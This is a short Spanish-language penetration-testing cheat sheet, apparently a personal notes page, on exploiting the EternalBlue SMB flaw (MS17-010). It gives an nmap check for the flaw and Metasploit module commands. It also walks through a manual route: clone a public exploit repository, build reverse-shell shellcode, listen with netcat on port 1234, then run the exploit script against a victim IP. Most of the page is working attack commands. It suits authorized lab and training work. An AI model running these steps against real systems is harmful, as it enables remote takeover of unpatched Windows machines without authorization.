Eternalblue - Vulnerabilidad SMB

Esta vulnerabilidad permite la ejecución remota de código debido a un manejo incorrecto de los paquetes SMB, lo que puede ser explotado para tomar el control de un sistema sin parches. EternalBlue fue utilizada en ataques de ransomware notorios como WannaCry y NotPetya en 2017

Comprobación Vulnerable con NMap

 nmap -sV -p445 --script=smb-vuln-ms17-010  <IP>

Si el siguiente comando devuelve que es vulnerable, procederemos con la explotación

Explotación Metasploit (Recomendado)

Usando el módulo: exploit/windows/smb/ms17_010_eternalblue

use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS
set LHOST
exploit

Explotación Manual

Clonamos el siguiente repo a nuestro sistema

GitHub - 3ndG4me/AutoBlue-MS17-010: This is just an semi-automated fully working, no-bs, non-metasploit version of the public exploit code for MS17-010GitHub

Instalamos las depencias: pip install -r requirements.txt

cd shellcode
./shell_prep.sh (y completamos los parámetros)

Esto nos creara el binario que nos devolverá la reverse shell

Nos ponemos en escucha con netcat (Puerto 1234 en nuestro caso)

nc -nvlp 1234

python3 eternalblue_exploit7.py <IP_Victima> <shellcode creado>

Última actualización hace 1 año

hashtagComprobación Vulnerable con NMap

hashtagExplotación Metasploit (Recomendado)

hashtagExplotación Manual

Comprobación Vulnerable con NMap

Explotación Metasploit (Recomendado)

Explotación Manual